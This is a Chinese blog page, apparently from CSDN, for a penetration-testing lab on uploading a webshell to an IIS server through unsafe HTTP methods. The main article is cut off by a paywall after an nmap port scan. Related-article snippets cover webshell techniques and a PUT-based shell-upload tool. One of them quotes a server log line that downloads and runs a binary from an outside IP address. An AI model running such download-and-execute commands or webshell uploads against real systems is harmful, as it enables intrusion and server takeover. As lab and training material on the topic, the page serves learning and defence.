WEBSHELL姿势之不安全的HTTP方法(渗透实验)

最新推荐文章于 2023-03-10 16:42:01 发布
最新推荐文章于 2023-03-10 16:42:01 发布
阅读量4.5k 收藏 4
点赞数 1
分类专栏: WEB安全 文章标签: 渗透测试 HTTP方法 windows提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/calmegm/article/details/49401547
版权

前言

Web服务器(以IIS为例)在没有任何设置是,使用OPTIONS命令,可以返回所有能够响应的HTTP方法,如OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK。


实验要求

任务:获取目标机上的两个文件(key1.txt和key2.txt),在C盘的根目录下存储有两个敏感文件(key1.txt,key2.txt)
      提示:
      1、信息收集,对目标机器进行信息收集,这里主要是端口,及服务。
      2、漏洞发现,针对服务(如web服务里面就有apache2,iis..),可以去看看其使用的软件版本是否存在漏洞
      3、利用漏洞,拿到shell,这个时候你应该可以拿到key1.txt了。
      4、权限提升,这个时候你就可以拿到key2.txt了。
0x00 端口扫描
使用metasploit console,执行命令nmap -p 1-65535 10.1.1.191

我们发现80和
最低0.47元/天 解锁文章
安全HTTP方法
谢公子的博客
05-03 3万+
我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。 WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Ser...
ActiveMQ漏洞复现(安全http方法具体利用)
嘻嘻哈哈
06-22 2895
1、搭建ActiveMQ环境 环境准备 jre安装及环境变量的配置: https://blog.youkuaiyun.com/tiantang_1986/article/details/53894947 下载有漏洞版本的ActiveMQ(我用的5.7.0) http://activemq.apache.org/download-archives.html 解压后进入bin目录,发...
webshell的一些姿势
LainWith的博客
11-22 5676
目录什么是webshellwebshell姿势实战案例1. 编辑模板拿webshell案例1:wordpress案例2:织梦cms v5.72. 文件上传拿webshell案例1:织梦cms v5.7案例2:南方数据企业系统,后台上传截断拿webshell3. 文件写入拿webshell案例1:织梦cms v5.7案例2:留言一句话到数据库拿webshell4. zip自解压拿webshell案例1:wordpress案例2:pageadmin5. 修改配置文件案例1:一句话插入配置文件拿webshel
漏洞挖掘-安全HTTP方法
weixin_48421613的博客
01-09 4631
如果文件修改失败,则会返回其他状态码,例如 405 Method Not Allowed。如果文件删除成功,服务器会返回 200 OK 状态码;使用 PROPFIND 方法,客户端可以请求服务器上的资源的属性列表,也可以请求具体的属性值。笔者在一次漏洞挖掘的过程中,几乎是习惯性的看了一眼OPTIONS方法,OPTIONS方法很简单,只需要在请求包里直接将GET/POST方法进行替换,即可看到服务器开启了哪些方法。​使用 DELETE 方法时,客户端向服务器发送 DELETE 请求,并指定要删除的资源。
HTTP协议——HTTP方法
热门推荐
vikeyyyy的博客
06-12 1万+
        这里对一些基本HTTP方法进行更为深入的讨论,并是每个服务器都实现了所有的方法,如果要跟HTTP1.1兼容,那么只要为其资源实现GET方法和HEAD方法就可以了。        即使服务器实现了所有这些方法,这些方法的使用很可能也是受限的,这些限制通常都是在服务器的配置中进行设置的,因此会随着站点和服务器的同而有所同。1、GET        GET是最常用的方法,通常用于请...
103.网络安全渗透测试—[升篇1]—[Linux内核漏洞]
qwsn
02-15 7345
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的exp (7)进行 (8)切换shell
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1759
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、、小工具等
weixin_46280935的博客
09-10 5971
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授访问漏
内网渗透——红日靶机学习(一)
jammny
11-13 6470
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
web服务器启用了安全HTTP方法
bobozai86的博客
09-14 8315
1、什么是安全HTTP方法 开发人员、运维人员一般可能用于调试服务器,开启了一些客户端能够直接读写服务器端文件的方法,例如:DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK 等HTTP协议支持的方法。 2、安全风险 可能直接通过浏览器直接在Web服务器上上传、修改或删除Web页面、脚本和文件。 3、安...
http_put_shell:使用http putcopymove方法上传shell
07-22
http_put_shell 使用http put/copy/move方法上传shell ###using: cmd > cd http_put_shell cmd > python http_put_shell.py
HTTP 方法详解
SnailDream
12-27 1434
一、基础篇 所谓HTTP请求方法就是你前告诉服务器你要进行什么类型的操作,如同你吃饭前先点菜,告诉餐厅要给你准备做什么样的菜。   一共有8个类型的方法   GET HEAD POST PUT DELETE OPTIONS TRACE 扩展方法
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 1万+
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程中获取Webshell的基本思路,实战中还需就地取材,灵活应对。
CTF—攻防练习之HTTP—暴力破解
weixin_30642029的博客
06-20 415
攻击机:192.168.32.152 靶机:192.168.32.164 首先nmap,nikto -host ,dirb 扫描开放带端口,探测敏感文件,扫描目录 开放了21,22,80端口,看到一个敏感目录secret 打开发现访问里面界面会跳转 vitcsec,但是打开,设置一下host gedit /etc/hosts 即可直接访问网页中内容 打开...
【测试】详解接口测试(2)- HTTP接口用例设计与测试方法(拿B站练手)
欢迎关注【微信公众号】测试开发Guide,从功能测试进阶测试开发
06-04 2187
文章目录# 接口测试是什么接口测试用例设计接口测试的方法使用工具编写代码集成测试框架完善测试框架测试数据存储 # 接口测试是什么 接口测试是测试系统组件间接口的一种测试。接口测试主要用于检测外部系 统与系统之 间以及内部各个子系统之间的交互点。测试的重点是要检查数据的 交换,传递和控制管理过 程,以及系统间的相互逻辑依赖关系 接口测试用例设计 接口测试的方法 使用工具 编写代码 集成测试框架 完善测试框架 测试数据存储 .........
HTTP接口测试
u010452967的博客
06-09 6086
一、什么是HTTP 二、为什么要使用HTTP 三、HTTP常用请求方式 四、HTTP测试工具 五、基于pytest的HTTP接口测试
【网络安全】 关于http服务器遭受webshell攻击
jn10010537的博客
09-17 3262
windows10】 关于http服务器遭受webshell攻击1、背景2、ip地址查询3、可疑请求ip 1、背景 在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。 比如: 209.141.56.212 - - [17/Sep/2021 04:52:04] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv
webshell检测方法归纳
计算机科研杂货铺
08-17 4275
背景 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell检测模型 Webshell的运行流程:hacker -> HTTP Protocol -> Web Server -> CGI。简单来看就是这样一个
企业环境渗透实验:爆破、Webshell与内网扫描
本次实验主题为“第6次网安实验1”,主要关注的是网络安全领域中的企业环境渗透,涉及的关键知识点包括Web网站后台风暴、SQL注入、PHPMyAdmin写入Webshell、内网扫描和域控账户密码的获取与利用。实验旨在让学生深入...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值